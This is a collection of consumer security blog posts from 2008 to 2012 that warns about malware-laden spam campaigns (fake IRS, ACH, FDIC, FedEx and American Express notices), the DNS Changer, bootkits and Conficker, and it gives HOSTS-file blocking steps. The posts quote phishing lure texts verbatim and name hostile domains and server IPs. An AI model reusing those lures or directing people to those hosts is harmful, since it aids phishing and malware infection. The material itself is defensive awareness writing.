I am going to impart some WIZdom to you to bring you up to speed on the nature of the hostile links in the current (April 2012) fake email Facebook Friend Requests.

Continue reading "Fake Facebook Friend Requests with huge links lead to malware exploit kit" »

Posted by Wiz at 1:03 AM | Permalink

back to top ^

Right now, the first week of April, 2012, there is a spam run hitting our inboxes spoofing American Express, with fake change of email address notices. These messages are convincing, having stolen images from the actual American Express website.

Here is an excerpt from one which I received a couple of minutes ago:

From: "American Express"
Subject: Confirmation of email address change

Thanks for updating your email address

We changed your e-mail address in our files to {spoofed or harvested email account}. If the new e-mail address is not correct or you did not request this change, please click here,..{spoofed link leads to malware}

If you, or someone you know was unlucky enough to click on one of these links, their PC will have been attacked by a browser exploit kit. You, or they need to run a full scan for malware with up-dated definitions in your installed security program. If you have not rebooted the computer since you clicked on the hostile link, run System Restore to a previous time or day, on your Windows computer.

If you lack any installed computer security, here are some options for you to try:

• Trend Micro security programs (I use this)


• Malwarebytes Anti-Malware (I use this)

Continue reading "Fake change of email address notice from American Express is Malware" »

Posted by Wiz at 5:26 PM | Permalink

back to top ^

The Internet can be a very dangerous place to place anymore. There are more malicious software (malware) threats out there than you can shake a stick at. The DNS Changer Trojan is one that needs to be mentioned right now. If you own or use a PC infected with the most recent variation of the DNS Changer, you may lose your ability to access the Internet on March 8, 2012.

What does DNS stand for?

DNS stands for Domain Name System. This is a system of electronic devices known as routers which locate websites you want to access by their common name, then translate those names into the numeric codes assigned to the web servers hosting those domains (websites). Every website is hosted on a computer that has a numeric address, known as an IP address, assigned to it. The DNS system searches and drills down through multiple layers of routing details until a numeric match is found for the website domain name you are trying to access.

For instance, my website, wizcrafts.net, is currently hosted on a web server belonging to Bluehost, with an assigned IP address of 66.147.244.184. It is reached after requests are routed from your home or business connection, through any required intermediaries, until the request ends up in Utah, at the facility owned by the hosting company. There, the internal routers sort out which one of hundreds of server in their facility is actually hosting my humble website. All this happens in the blink of your eye!

It's not just websites that use the DNS system. Your very own Internet connection is also part of that system. You get your Internet connection from a local Internet Service Provider (ISP), via a modem, or Wi-Fi, or cellular network, or hard-wired wide area network. Your connection has an IP address assigned to you by your ISP. When you access the Internet to browse websites you are usually going to use DNS servers belonging to your ISP. These DNS servers relay your requests for websites, or other Internet resources, to various upstream Domain Name Servers around the world.

When you connect to your ISP, their system assigns their primary and secondary (in case one fails) DNS servers to you, to use for accessing the Web. You trust those DNS servers to faithfully relay your requests to the desired target websites, or other resources (newsgroups, IRC, IM, email, ftp locations, online storage, etc). But, what if somehow, those good DNS servers belonging to your ISP were replaced with rogue servers owned by cyber-criminals?

Continue reading "PCs infected with DNS Changer to lose Internet connections on March 8, 2012" »

Posted by Wiz at 10:53 AM | Permalink

back to top ^

There is a currently ongoing spam campaign which sends an official looking document, with images from the US Internal Revenue Service. The subject and body refer to a tax return problem. The recipient is told to read the report at IRS.gov, but the link provided goes offshore, to a look-alike scam web page, serving malware.

I traced down one of these scams that came in today (Oct 10, 2011) and here are my findings.

The link in the email, falsely claiming to go to a report page at the irs.gov, actually led to a website named http://systrmp.com (using standard html code to link to one place, but show the user a different destination). If the intended victim was to hover their mouse or pointer over that link before clicking on it, they would see the true destination in the Status Bar of their email reader (browser or standalone desktop email client).

The message body is written to cause panic in the recipients, causing some to blindly click on the link, without checking out the destination first. Here are the words used to panic recipients into action:

Notice ID: CEXOSTSZUJ8747
Notice: CP01H
Tax year: 2011
Notice date: Mon, 10 Oct 2011 09:11:50 +0100
Page 1 of 1

Important information about your tax return
We are unable to process your tax return

We received your tax return. However, we are unable to process the return as filed.

Our records indicate that the person identified as the primary taxpayer or spouse on the tax return was deceased prior to the tax year shown on the tax form. Our records are based on information received from the Social Security Administration.
Based on this information, the tax account for this individual has been locked.

What you need to do

Visit review page on irs.gov (<-- Hostile link goes here)
Keep this notice for your records.
Department of Treasury
Internal Revenue Service

Continue reading "Spammed IRS Tax notices lead to Zbot malware infection" »

Posted by Wiz at 11:43 AM | Permalink

back to top ^

Earlier this week I noted that the spate of fake ACH transaction canceled spam emails had subsided. Well, no time off for crime fighters. They returned today, along with some fake invoices and "changelogs" in spam messages, sent from infected computers in spam botnets.

My email spam-screening program is MailWasher Pro, which uses a combinations of several tactics to determine if an incoming message is good or bad, friend or foe. The program allows users to compose their own spam detection filters, based upon various criteria found in email messages; some hidden, some visible. I write and publish filters for MailWasher Pro users and some of the most effective filters right now are the ones that detect ACH scams and emails with Zip file attachments.

All of the ACH fraud messages, along with the fake invoices and changelogs, contain malware downloaders inside the attached files. Anybody running a Windows computer who misguidedly opens the attached zip file and its enclosed .pdf.exe file, will have a botnet Trojan downloader installed within seconds. This downloader then goes to work, behind the scenes, to download and install other malware, including the infamous Zbot, aka Zeus bank credential stealing Trojan.

The subjects and come-ons used in this latest spam run are listed below, in my extended comments.

Continue reading "Return of fake ACH & invoice emails with malware in attachments" »

Posted by Wiz at 10:44 PM | Permalink

back to top ^

Earlier this week there was a drop off of the previous spam run of fake ACH Payment Canceled emails, all loaded with malware inside their attached files. They were replaced by a blast for FDIC scams. Now, the ACH scams have returned, with a vengeance.

The new subject in today's spam blast is: ACH Transfer Review. The forged sender is an account name like this: ach [email protected]. The body text is as follows:

Dear Client,
ACH transfer (ID:) is going to be reviewed because of the incorrectly input data
when sending the payment.

Important:
Please, fill in the application form attached attentively and send it to us.
After that your transfer will be processed.

If you have any questions or comments, contact us at [email protected].
Thank you for using www.nacha.org

(NAME REMOVED)
NACHA Risk Management Services

The attached "form" is currently named: "form-62091.zip" and it contains a Trojan Horse (currently Zbot, a.k.a. Zeus) that will infect your computer with malware that intercepts keystrokes when you log into a bank, or other financial organization being targeted by the perpetrators. It then sends your login credentials to the criminals who are renting the botnet, whose member computers are sending these scams to you and everybody else. Some variants of the ACH scams actually install a botnet (currently "Bredolab") controller, which then downloads the other bad stuff to your PC, and possibly to your networked PCs.

The email claims to come from the headquarters of ACH , but, the headers show something different. Look at these three Received from lines, obtained from three different spam emails today:

Received: from [115.118.159.231] (helo=cgorq.com)
Received: from [178.123.157.77] (helo=sqibyat.com)
Received: from [187.117.248.91] (helo=hcyayyax.com)

The IP 115.118.159.231 belongs to TATA Communications, in India. The IP 178.123.157.77 is assigned to The Republic of Belarus. Last, 187.117.248.91 belongs to someone with a hacked computer in Brazil. The real ACH payment system is managed by Nacha.org, a US based company, whose servers are here, in the USA. NACHA stands for: National Automated Clearing House Association

The real NACHA does not send email alerts to individual bank customers. It only deals with the banks and credit unions themselves. Unless you work for a bank, or credit union, you should never ever receive any email from nacha.org (or nacha.us, .net, or .com).

Continue reading "ACH email scams with malware in attachments continues" »

Posted by Wiz at 12:35 PM | Permalink

back to top ^

It was only a couple of days ago (8/26/2011) that I published a blog article warning people about the threats contained in fraudulent emails claiming that an ACH transfer had been canceled and that the recipient needed to read the report in the attached file.

Beginning at 3 AM, EST, I received four consecutive email scams in 15 minutes, with the subject: "FDIC notification," with the forged sender (the actual "sender" is an infected PC in a spam botnet): "[email protected]," and the following body text:

Dear customer,
Your account ACH and WIRE transaction have been temporarily suspended for
security reasons due to the expiration of your security version. To download and install the newest installations read the document(pdf) attached below.
As soon as it is setup, you transaction abilities will be fully restored.

Best Regards, Online Security departament, Federal Deposit Insurance Corporation.

The attached file is currently named "FDIC_document.zip" - although the filename may change soon.

Like the UPS and ACH scams that preceded it, this scam contains a variant of the Zeus or Zbot Trojan Horse. Its purpose is to install hidden malware that watches for you to visit targeted financial institutions, or your website's control panel, or PayPal, etc. Once you do it intercepts your login credentials and forwards them to the criminals running these scams. Your bank accounts, PayPal accounts and God knows what else may be emptied before you know what hit you!

If you use MailWasher Pro to screen your incoming email for spam and threats in attachments, my custom ZIP Attachment filter will alert you to these and similar threats. Never open the attachments in these scams! Delete the email on sight! Opening these messages will launch the installer for the Zbot. Your PC will not only have the Zeus keylogger installed, but will be made a part of the Botnet from which you received your recruitment message.

Posted by Wiz at 3:01 AM | Permalink

back to top ^

For the last 2 days I have seen a slowly building spam campaign featuring a previously used trick Subject: "ACH Payment (7 numbers) Canceled." The message body is short and sweet, along the line of the following:

The ACH transaction,
recently initiated from your checking account (by you or any other person),
was canceled by the other financial institution.

Rejected transaction

Reason for rejection: See details in the attachment

The "report" is in a double extension file, with a name like: "report_082011-65.pdf.ZIP (ZIP archive, Adobe PDF)" - although future variants may arrive with just a .zip or just a .pdf extension.

The From line is usually: "account manager" ([email protected], or [email protected]). You will be getting these sent to every one of your email accounts, should you have multiple accounts, like I do. Domains with email are especially hard hit in today's spam campaigns.

The actual "sender" is a PC in a spam botnet, operating under commands from the Bot Master running this show. All reply-to and From information is forged.

The payload in the current crop of malware in attachments is the "Zeus" aka: "ZBot" keylogger Trojan. The installer may also make the victim's computer a member of the same botnet from which their scam message was sent. This perpetuates and increases the size of the botnet and steals money from victims as they log into banks and payment portals targeted by this Zeus variant.

My advice to recipients of one of these, or future variations of these scams, is to phone you bank, or financial institution and ask them to check your account for problem transactions. Note, there have been some spam campaigns that include a fake contact phone number that actually leads to people hired by the criminals running particular campaigns. So, your safest bet is to look-up the number for your bank, or flip over your debit or credit card and call the number listed on it.

Interestingly, these malware in attachments scams began on August 25, just after the previous run of UPS malware scams ended. No doubt, the same botnet is sending both, rotating subjects and body text and attachment names, via templates downloaded to the zombie computers in the botnet.

I delete all such malware laden spam messages, which are automatically flagged by one or more custom spam filters I write, by my email screening program: MailWasher Pro - (learn about MailWasher Pro here). My advice to you is to delete them on sight, without opening them. Phone your bank if you are worried.

If your bank sends you email messages and alerts about problems, the message will include your proper name. None of these scams include any personal names as salutations. That is red flag number one in all such malware and phishing scams.

Stay alert to scams in spams. Do not open any email attachments out of curiosity. Only open attachments you are expecting, from senders you are expecting them from, and then, only if you have modern, fully updated anti-virus/anti-malware protection running on your computers.

Posted by Wiz at 10:47 AM | Permalink

back to top ^

On June 22, 2011, a Microsoft researcher published disturbing findings about a new variant of a rootkit named "Popureb" - by Microsoft's Malware Protection Center. This variant, dubbed Popureb.E is a Master Boot Record (MDR) infector, as were its predecessors. But, this variant is different than the others in that it has a unique defense against being removed by the usual methods.

Rootkits are bad news for those whose computers are infected with them. The hide deep inside the operating system and act as puppeteers for other badware files. Rootkits can act as downloaders of malware and upgrades to it, as spam engines, and protectors of the malware programs they have installed. They can even act as a strange kind of anti-virus, by uninstalling rival malware files.

"Kernel mode" rootkits can usually be removed by using advanced anti-virus program modules that stop the rootkit process in memory, enumerating its normally hidden files and start-up Registry entries, then deleting them during a reboot cycle.

Boot sector, or MBR rootkits are a horse of another color! Boot sector rootkits are the worst of the worst. They hide in the first sector (0) of your boot hard drive and are loaded along with the hardware devices, as the computer boots up, before the OS is active. By loading at the beginning of the boot-up cycle, MBR rootkits, also known as "Bootkits," are able to evade detection by normal anti-virus programs. Even if detected, removal often requires rewriting the MBR, which overwrites the bootkit code with legitimate start-up code.

The most common way to remove standard MBR rootkits and other sector 0 infectors, is to use any preinstalled recovery console, or repair options that exist on that PC. Windows XP and 2000 had an installable Recovery Console, which was added to the boot options menu. Windows Vista and Windows 7 install repair options that become accessible when you restart and tap the F8 key repeatedly. This option is called Repair Your Computer.

So, let's say you have an XP, Vista or W7 computer that acquires a boot sector infector and you have either the Recovery Console, or Repair Your Computer option available during the initial boot cycle. If you go into one of those options from the boot menu or F8 boot options, and choose to "repair your startup files" (Vista/7), or use the Recovery Console, to rewrite the MBR (FIXMBR), will it kill the newest bootkits? Not if it is the one dubbed "Popureb.E."

Continue reading "New variant MBR rootkit removal requires Windows or repair disk" »

Posted by Wiz at 11:27 AM | Permalink

back to top ^

This is the latest entry in my weekly series about classifications of spam, according to my custom filter rules used by MailWasher Pro. The categories are shown on the "Statistics" page > "Junk Mail," as a pie chart, based on my custom filters and blacklist. The amount of email flagged as spam is shown on the "Summary" page of Statistics. These reports can help you adjust the order of your own spam filters.

MailWasher Pro is a POP3 and IMAP email spam screener that checks email before it is downloaded to your desktop email client. It can be set to delete recognized spam either manually or automatically when a user-defined filter, or the built-in learning filter, or a blacklist entry, or known spam source is matched, or an attached virus is detected.

My incoming spam levels have decreased 2% this week, to 58% of all my incoming email. Most of the spam was typical junkmail for counterfeit Chinese watches, fake Cialis and Viagra, illicit prescription drugs and male enhancement scams. There were also some new variations of malware in attachments scams, in fake CV resumes in zip files. There was a dangerous link spam campaign, posing as LinkedIn messages, leading to serious exploit attacks and the Zeus banking credential stealing Trojan. Finally, there was spam for fake diplomas, and some pirated OEM software, hosted on Russian domains.

The LinkedIn attack was coordinated and sent (via Botnets) by the same people behind the malware infected fake CV resumes (Zeus Trojan). They are headquartered in The Ukraine and 5 of them were just arrested this week. Another 11 were arrested in The UK and dozens more were arrested or had warrants issued in the USA. Almost all are Russians, Ukrainians and people from other Eastern European countries. Quite a few in the US are Russian students here on J1 Student Visas.

The classifications of spam in my analysis (below) can help you adjust your email filters according to what is most common, on a weekly basis. If you are using my custom MailWasher Pro filters, keep the filters for the highest percentage categories of spam near the top of the filters list, to minimize the impact on your CPU when analyzing incoming messages for spam content.

Since virtually all spam is now sent from and hosted on hijacked PCs that are zombie members of various spam Botnets and all email sender addresses are forged, there is no point in complaining to the listed From or Reply To address. These accounts are inserted by the same script that composes the spam on the compromised PCs. These are innocent spam victims themselves, whose harvested names are reused in forged From addresses.

Sometimes, your own email address is forged as the sender, as well as being the recipient. The practice of forging the recipient's own email address in the From field is known as a "Joe Job." Fortunately, MailWasher Pro has a custom filter option that overrides the "Friends" list (a Whitelist of approved senders), allowing user created spam filters to read the content and flag or auto delete spam that's using one's own accounts as the forged sender.

You can take preventative measures to secure your computers from becoming members of Botnets, by installing Trend Micro Internet Security and MalwareBytes Anti-Malware (see pages for details).

See my extended comments for this week's breakdown of spam by category, for Sept 27 - Oct 3, 2010, and the latest additions to my custom MailWasher Pro filters and Blacklist.

Continue reading "My Spam analysis & filter updates for the week of Sept 27 - Oct 3, 2010" »

Posted by Wiz at 3:18 PM | Permalink

back to top ^

For a couple of days I have been seeing a new round of nasty Trojan attachments in emails posing as FedEx invoices. This scam is not new. It has been ongoing for months now. The payload, in an attached zipfile, has been either the Bredolab or Zeus Trojan in the recent past. The Bredolab makes a PC a member of a spam and DDoS Botnet. The Zeus (Zbot) plants and info stealing keylogger on your system, then protects it wilh a rootkit. The Zeus monitors logins to a long list of popular banks, payment processors and online game sites, then captures the key strokes as you log in, and soon, most of your money is gone to Russia.

Although the scam is not new, the method of delivering the convincing con has changed. This week has seen the arrival of the con being embedded in an inline image, in the .jpg format. The message I am looking at right now has the following text embedded as its content:

"Dear,
Unfortunately we failed to deliver the postal package you sent on the 27th of July in time because the recipient's address is erroneous. Please print out the invoice copy attached and collect the package at our office."

The message then screws its own pooch by displaying this odd text: "'Spiderman' climbs again in Sydney ." However, I'm sure that will disappear, as spam filters around the world tune in to that phrase.

The attachment, which claims to be a FedEx document (invoice) is inside a .zip file and is in fact a very dangerous Trojan. If you open the zip file and launch the embedded executable, your PC will become a zombie member of a spam and attack Botnet, and or will have the Zeus Trojan installed, to steal your logins and money.

If you may have already fallen for this scam, please scan your computer with the Trend Micro online Housecall malware scanner. Then, if at all possible, update your existing anti-virus program and scan with it. If your anti-virus is old and the subscription is expired, download a free, fully functional trial of Trend Micro Internet Security. Install it, update it, then scan the entire computer.

Further, I recommend downloading and installing/scanning with Malwarebytes Anti-malware (MBAM). Both of these security applications will detect the threats contained in the fake FedEx scams attachments and will halt their hidden processes and delete their files. You will have to restart the PC and scan again and may have to disable System Restore. Many types of malware hide as backups in the hidden system restore folder and are restored after you clean the machine, then reboot. Turning off System Restore kills the malware backups. Don't forget to turn it back on after cleaning has completed!

If the malware prevents you from updating, or installing, or running a real security program, go to Bleeping Computers malware removal forum, sign up for an account, read the instructions, then open a new topic requesting personal help. A trained, volunteer malware removal expert will assist you as soon as he or she is able to. They will recommend free tools you can use to restore your PC to normal working condition. Read every word carefully and only do what you are asked to do.

Malwarebytes also has an expert malware removal assistance forum. Their forums are meant for people attempting to use MBAM to remove malware.

Both of the aforementioned programs will protect you from getting infected in the first place! Trend Micro Internet Security not only has regularly updated onboard malware definitions and behavioral analysis engines, but also consults a definitions server referred to as a "Cloud Server." As new releases of malware are captured (by security company honeypots), they are rapidly examined and new definitions are published to the Cloud servers, before they are pushed to client computers. Further, the destination websites are instantly blocked by the "Trend Micro Smart Protection Network." All subscribers to Trend Micro security programs are instantly protected from visiting those hostile websites and servers. You can learn more, download and purchase a subscription here.

Malwarebytes Anti-Malware is free to use in purely manual mode, but this won't protect you against reinfection. You can get realtime protection and automatic updating and scanning by paying $24.95 US dollars or equivalent in your currency, for a lifetime license. Read the details and download or purchase a license for MBAM here.

Posted by Wiz at 12:58 AM | Permalink

back to top ^

Spybot Search & Destroy is a free (for personal non-business use) anti-spyware/spyware removal program used by millions of people around the World, to protect their computers from spyware, adware, Trojans and other types of malware. Spybot updates for malware detections are released every Wednesday and this week's updates were released on schedule. If you are using Spybot S&D to protect your computer you should check for updates every Wednesday afternoon and apply all that are available.

Malware writers are constantly modifying their programs to evade detection, so anti-malware vendors have to issue regular updates to keep up with the bad guys. New definitions and false positive fixes for Spybot Search and Destroy are usually released every Wednesday. This week's updates were released on schedule, as listed below. 11 new or modified fake security programs (fraudulent anti virus/spyware) were added to the "Malware" detections, plus 29 new or modified Trojans, rootkits and spam bots were added to the "Trojan" list. These include 2 variants of the infamous Zbot, a.k.a Zeus, banking Trojan.

Note: one + sign before a detection indicates an update to an existing malware family for which previous definitions have been released. Two ++ signs indicate a completely new detection of a new or rewritten malware type.

Definition updates made on 03/17/2010

Adware
++ Ulineguide

Malware
++ Fraud.Antivirus7
++ Fraud.CleanUpAntivirus
++ Fraud.ContentCleaner
++ Fraud.ErrorWiz
++ Fraud.MyComGuard
+ Fraud.MySecurityWall
+ Fraud.PCSecurity2009
++ Fraud.PrivacyOn
++ Fraud.SmartSecurity
+ Fraud.Sysguard
++ Fraud.XPInternetSecurity2010
+ Lop
++ Win32.Downloader.aafm
+ Win32.FraudLoad.edt

Spyware
+ AdRotator
+ Win32.Spynet.a

Trojans
+ Virtumonde.sci
+ Virtumonde.sdn
++ Win32.Agent.ddod
++ Win32.Agent.fla
++ Win32.Agent.shi
+ Win32.Allaple.ab
+ Win32.Ambler
++ Win32.AutoRun.fw
++ Win32.Banker.ju
+ Win32.Banload.up
++ Win32.Clicker.ad
+ Win32.FakeAlert.ttam
+ Win32.FraudPack
++ Win32.IRCBot.sys
+ Win32.Koobface
+ Win32.OnLineGames.down
++ Win32.OnLineGames.mfbh
++ Win32.OnLineGames.mfeg
++ Win32.OnLineGames.mffa
++ Win32.OnLineGames.mffh
++ Win32.OnLineGames.mfgr
++ Win32.Rbot.mum
++ Win32.SdBot.wch
+ Win32.Swisyn
+ Win32.TDSS.rtk (rootkit)
+ Win32.ZBot (a.k.a.: Zeus)
+ Win32.ZBot.rtk (Zeus rootkit)
++ XPInternetSecurity2010.FakeAlert
+ Zlob.PornPassManager

Worm
+ Win32.Amburadul

Total: 2161084 checksums in 812212 rules for 5267 products.

Continue reading "Spybot Search & Destroy updates for March 17, 2010" »

Posted by Wiz at 5:08 PM | Permalink

back to top ^

Here is a summary of this week's vulnerabilities and exploits in the wild, as reported by Secunia, Websense and other security firms. Actually, this has been a quieter week than most.

Websense has been following a website code injection event they named the "Nine Ball Mass Injection," which is a follow-up to the "Beladen" and "Gumblar" mass injection attacks last month This is a situation where cyber criminals exploit vulnerable web application scripts that have not been secured by the webmasters who operate those websites. Too many webmasters use free scripts that are rarely, if ever updated to patch announced vulnerabilities. Hackers send out automatic scripts (a.k.a. robots, spiders) that try to upload hostile files to any website they come across. Once they find an unpatched point of entry they are able to alter the codes on any web pages (usually the home page) they want. In the past, hackers would deface home pages with gibberish or slogans for their causes. Now, it is criminals who sneak in dangerous hidden codes that redirect innocent visitors to hostile websites, where malware is attempted to be downloaded to the victims' computers. Most are successful, because most people do not, or cannot keep up with patches released by every vendor of the add-ons and plug-ins used by their browsers.

Most of the malware being downloaded by the Nine Ball and similar exploits is fake security applications that pretend to scan you computer, announce so many threats found, then demand payment to remove those threats. These are tandem malware programs, with part one being the fake alerts and part two being the fake remover. After you pay to unlock the remover, it only removes the alerts its sister placed there in the first place. You will have submitted your credit or debit card information to cyber criminals in the Former Soviet Union and can expect to have your accounts drained shortly.

The rest of this weeks vulnerabilities and exploits are in my extended comments.

Continue reading "Weekly roundup of vulnerabilities and exploits in the wild" »

Posted by Wiz at 2:42 PM | Permalink

back to top ^

Yesterday, April 30, 2009, when investigating a problem with an associate's websites, I traced a cross site scripting iframe exploit, pointing to a malware middleman website at tojandglow.com, which redirects victims to a hostile server hosted in the Ukraine by Eurohost LLC. This Ukrainian server is currently dispensing malicious software that includes 9 Trojans, 7 scripting exploits and 1 virus.

The hostile iframe code was injected into the home pages of two related websites by exploiting vulnerabilities in a PHP script used by the webmaster of those websites. The server dispensing the exploits is located at 91.212.65.138, which coincides with the Eurohost home page. The CIDR assigned to Eurohost is 91.212.65.0/24 and you should block access to it in your firewall IP blocking rules, or in your Windows HOSTS file. Examples of how to do both are found below.

Any website that is running php or cgi scripts is in danger of becoming an inadvertent carrier of the redirection iframe that leads your innocent visitors to servers that are rigged to exploit a variety of exploitable vulnerabilities in their browsers, or browser add-ons, plug-ins, or helper objects. Some of the most frequently exploited applications are Internet Explorer (any version prior to 8.0), Adobe Flash, Adobe Reader and Apple Quicktime. Other exploited programs include Apple Safari, Google Chrome and occasionally, Mozilla Firefox. On rare occasions the Opera browser and the Java plug-in are vulnerable to targeted attacks. Firefox and Opera browsers are usually updated very quickly after a vulnerability is reported to their maintainers. Plug-ins usually take longer to update because they have to interact with so many other items and applications.

Webmasters and server administrators, you are responsible for keeping up to date with patches released by software authors, for any applications or scripts that you choose to run on your websites. Information to help you protect your websites and servers from getting exploited by hostile injection probes is in my extended comments.

Individuals browsing the Internet are the real targets of all of these injection attacks. This includes everybody reading this article. You and I have to constantly remain vigilant about threats to our computers' security. New exploits are found every month and are often released in the wild before software authors can respond with patched versions. Those are called zero day exploits. There are several ways to protect your computers from these exploits, including, but not limited to keeping up to date with all Windows, Mac or Linux updates and patches, and patches for commonly exploited third party browser add-ons, like Flash players, PDF Readers, Quicktime and Java plug-ins. Your next line of defense is a combination of security programs encompassing a 2-way firewall, anti-virus and anti-spyware and web threat protection that blocks hostile web pages. Or, you can install one top-notch security suite, like Trend Micro Internet Security and have all these protections and more in just one regularly updated package. There are links to reputable security products in the right sidebar on all of my blog pages.

Windows users have an additional means of protecting their PCs from visiting hostile websites. There is a special file, normally found in (C):\Windows\System32\Etc\, with the unusual file name: HOSTS . Although it has no file extension it can be opened and edited using the built-in Windows Notepad. The HOSTS file takes input in the form of IP addresses and website URLs, separated by a tab or multiple spaces. To protect your computer from being redirected to the hostile tojandglow website, or the Ukrainian server it tries to redirect you to, open your HOSTS file and edit it using these steps.

1. Using Start > (My) Compute, double-click on the C drive icon, then navigate to your Windows\System32\etc\ folder.


2. Inside the "etc" folder you should see a file named "Hosts" You may have to unhide system files before this file can be seen. See my extended comments for details on how to do this.


3. Right-click on the file named HOSTS and choose (left click) Properties


4. Find the attributes section starting with "READ-ONLY" and uncheck it if it was checked


5. Click Apply and OK to close the Properties window.


6. Right-click on HOSTS while holding down the Shift key and select "Open With"


7. Scroll through the programs list until you find "Notepad" and double-click on it


8. If Notepad isn't listed you will have to use the browse button to navigate to the Windows folder, where Notepad.exe is located.


9. With HOSTS open for editing go to the last line in the file and hit ENTER


10. Add these lines, with a tab after each 127.0.0.1:
    
    
    
    • 127.0.0.1       tojandglow.com
    
    
    • 127.0.0.1       91.212.65.138
    
    
    • 127.0.0.1       91.212.65.0/24
    
    


11. Click File > Save and in the File Type selection, choose All FIles and save it as HOSTS, without an extension.


12. Windows may decide to add a .txt extension anyway. If it does, allow this, then right-click on the saved file and delete the .txt extension. Answer the challenge about changing file extensions.

Reboot your computer to make this protection take effect. From that point on any script that tries to redirect you to any of the web addresses listed in the HOSTS file will instead be looped right back to your own computer, commonly referred to as 127.0.0.1, or Local Machine. The injected iframe would display a "page cannot be found" error if it was visible (it isn't; it's only 1x1 pixel!). Do the same anytime a new hostile website or ip address is published.

BTW: If you see any 127.0.0.1 entries referring to microsoft.com in your HOSTS file, remove them! Malware put them there to prevent you from getting Windows Updates or Microsoft security downloads. Ditto for any recognizable security vendors' websites.

Continue reading "Block Ukrainian Malware Server on Eurohost" »

Posted by Wiz at 5:10 PM | Permalink

back to top ^

The newest version of the Conficker Worm, a.k.a. Downadup, said to have already infected over 10 million PCs, is programmed to begin contacting a huge list of new domain names, beginning on April 1, 2009. Each PC that is currently infected with the most recent variant of this Worm will begin generating a list of 50,000 domain names, many of which might be registered by the criminals behind this Worm. It will then pick names it generates on each infected computer and try to contact that domain, for further instructions, or program updates. If those domains are in fact active and under the control of the Botmasters running the Conficker Worm, updates will be sent to all of the PCs making contact on, or after April 1. Those updates are probably going to make it more difficult to disinfect these PCs, or to contact any security websites for malware removal tools.

If you are not already infected it is because you took the proper preventative measures last October 23, 2008. That was the date that Microsoft released a sudden, out-of-cycle critical update, in security bulletin MS08-067 and Windows Update patch kb958644, which plugged a vulnerability in the Windows Server Service. That vulnerability is what was exploited by the first two releases of the Conficker Worm (Conficker.A and .B). Since most Windows users who run legitimate copies of Windows have set their computers to receive and apply Automatic Windows Updates, they were protected when the Worm was first released in the wild, in November, 2008.

However, people who turned off Automatic Updates because they don't trust Microsoft updates, or because they are using pirated copies of Windows and don't want to get nagged about it, probably got hit by this Worm, soon after its release. The highest percentages of Conficker infections occurred in countries with the highest numbers of pirated Windows operating systems. These nations include China, Russia, Argentina, and Brazil.

I would like to point out that there is another group of vulnerable people, who may not realize that they are critically exposed to the Conficker Worm (and the likes). These are legitimately licensed users of Windows XP, or newer, who had to reinstall their operating systems to fix other problems or malware infections, any time after the MS08-067 patch was released. If you let any significant time elapse between reinstalling Windows and then obtaining all available patches, especially MS08-067, you could have been exposed to a Conficker attack and possibly been infected and don't know it yet (not likely - the Worm causes noticeable trouble on a PC). This is why I always make my first Internet connection after validation to Windows Updates (repeatedly, until all patches have been installed)!

If you want to know if your Windows PC is infected just try to go to Windows Updates, either via the link in your Start Menu, or using the link in Internet Explorer, under Tools. If you can't open Windows Updates at all, but can visit other non-security related websites (Yahoo, MSN, CNN, etc), you just may be Confickered. To find out for sure you should run scans with any anti virus software you have installed. Try to update it first, before scanning. If you are already infected with Conficker.B, or Conficker.C, you will not be able to update most anti virus definitions at all. This is caused by the Worm denying access to any website run by any major security vendor.

If this is the case for your PC(s) there is a downloadable Conficker Removal Tool available from Bit Defender, that removes Conficker A, B and C variants. The removal tool is available here. There is also an online scanner on the landing page, which you can run to see if you are indeed infected. If the Bit Defender page is inaccessible, here is the URL for the online scanner: http://91.199.104.31

Note, that licensed users of Trend Micro Internet Security products are already protected against the Conficker threats.

I will have more to tell you about this Worm after tomorrow comes and goes. We will see what we shall see!

Posted by Wiz at 7:08 PM | Permalink

back to top ^

Computer "Bot"

Abbreviation for "robot." In this case a software robotic program.

A computer Bot is a remotely controlled malware program that is installed onto a computer without the knowledge or consent of the computer's owner. This type of program may have complete control over the operation of that computer and its Internet functions, but usually does not reveal its presence to the computer's owner or users, or try to interfere with the normal operation of that computer.

All Bots work in stealth mode, so as to prolong their useful lifetime on each computer they infect. Because Bots operate behind the scenes, sometimes as rootkits, special anti-malware tools are often needed to detect and remove them. Some Bots may even uninstall themselves if the computer or its Internet connection don't meet the minimum requirements set by the person running them.

When a Bot is installed onto a computer that computer will not only be remotely controlled, but will become an unwitting member of a network of similar Bots, known as a "Botnet." Bots are accumulated into Botnets by "Bot Herders" who rent the use of their remote controlled networks to spammers, scammers, phishers, political anarchists, hackers and even terrorists. A Botnet in action is under the remote command and control of a criminal known as a "Bot Master."

When a computer is first infected by a Bot it will perform certain pre-programmed routines, including "phoning home" to register itself on the Botnet it belongs to and to supply details about the computer onto which it is installed. Some of these details are about the operating system and amount of memory installed, the infected user's identity on the computer, the password for the Administrator account, what, if any security programs are installed, the type of Internet connection used and the IP address of both the computer and the modem (if different). It will then receive files to be consulted and used as it operates. It may also be given some means of protecting its own executables and auxiliary support files, to ensure its continued existence if it is detected by the owner.

Unless you are an expert in securing your computer and operate with reduced user privileges, you should be asking yourself: "am I botted?" Don't leave this question unanswered! Find out now! There are a variety of new, specialized security tools available that will detect and remove modern Bot infections. Some really good Bot detection tools are listed in my extended comments.

Continue reading "About computer Bots and how to detect and remove them" »

Posted by Wiz at 4:36 PM | Permalink

back to top ^

The authors of the Storm, Srizbi, Pushdo and Rustock botnets (and others) are ramping up their individual efforts to assemble the largest collective botnet the World has ever seen, using fake news headlines in the subject and body of spammed emails. The latest fake news about the Olympics is sent from the Storm Botnet. Almost all of the BotMasters are purported to be based in Russia and are members, or former members of the notorious Russian Business Network. The purpose of this rush to acquire more and more zombie computers in a short time is undisclosed right now, but may be in preparation for a cyber war, in which the zombie computers will be used in denial of service attacks against other governments, anti-Russian websites, universities, or military installations.

Or, the purpose may just be to have more power to send gazillions of spam messages hawking male enhancement pills, fake pharmaceuticals, shady loans, or counterfeit watches and shoes, but I think they already have enough zombie computers to do that work.

I don't want any of my readers to fall into these traps and have their PCs drafted into these hostile robotic armies. Therefore, you need to know that the authors of the tens of millions of spam messages that are spewing out of hundreds of thousands of zombie computers, some at the rate of up to 10,000 spam emails per day - per PC, are using every social engineering trick they can come up with to fool you into clicking on a link in just one of these scam messages.

